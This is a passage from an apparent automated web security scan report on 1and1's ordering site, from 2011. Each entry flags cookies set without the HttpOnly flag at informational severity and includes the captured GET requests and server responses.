Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:51:10 GMT; Path=/
ETag: 94db72fd5b11780c9d37ff4ca080259b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18688


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.147. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.148. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:57 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1629a85634893c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServer;jsessionid=C2308EF9B0B46214BD37352C5DF6EE78.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.149. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.150. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerL HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:41 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3f29a4af086a7400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=B6A0DDB4C9D77F6E2F638CC55443C1A0.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.151. http://order.1and1.com/xml/order/VirtualServerXL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerXL HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:01 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5bfc5160a7724c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXL;jsessionid=67A05F3546DF54F05E7E1C8F2AFF7904.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.152. http://order.1and1.com/xml/order/VirtualServerXXL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXXL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServerXXL HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:19 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=fe6152de8608c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXXL;jsessionid=F5B87BF4E4F277246DDE16E8B5F7FAFB.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.153. http://order.1and1.com/xml/order/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320185042-000.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:35:AAABLtRozfrxbl4XBdcVOt1gOzbPq29h:1300643761658; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:56:14 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=11df10d3b144d000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/a;jsessionid=32FBEC28C43E74DBD62611CCB0A88751.TCpfix142a
Content-Length: 0
Content-Type: text/plain


5.154. http://order.1and1.com/xml/order/addon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/addon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/addon HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:52:09 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=651016b876a97400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/addon;jsessionid=AA64A8E9BE0F46BF3EB96366BA2FCD13.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.155. http://order.1and1.com/xml/order/costs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/costs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/costs HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:58 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=21b62dcc6185f000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/costs;jsessionid=F97987AC39B8E18D580FCDA0A43A753A.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.156. http://order.1and1.com/xml/order/domaincheck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/domaincheck HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:31 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=74df2828c0bde800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/domaincheck;jsessionid=0C1C78F2B9E1ED296CC3F09976AC6E11.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.157. http://order.1and1.com/xml/order/domaincheck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.158. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
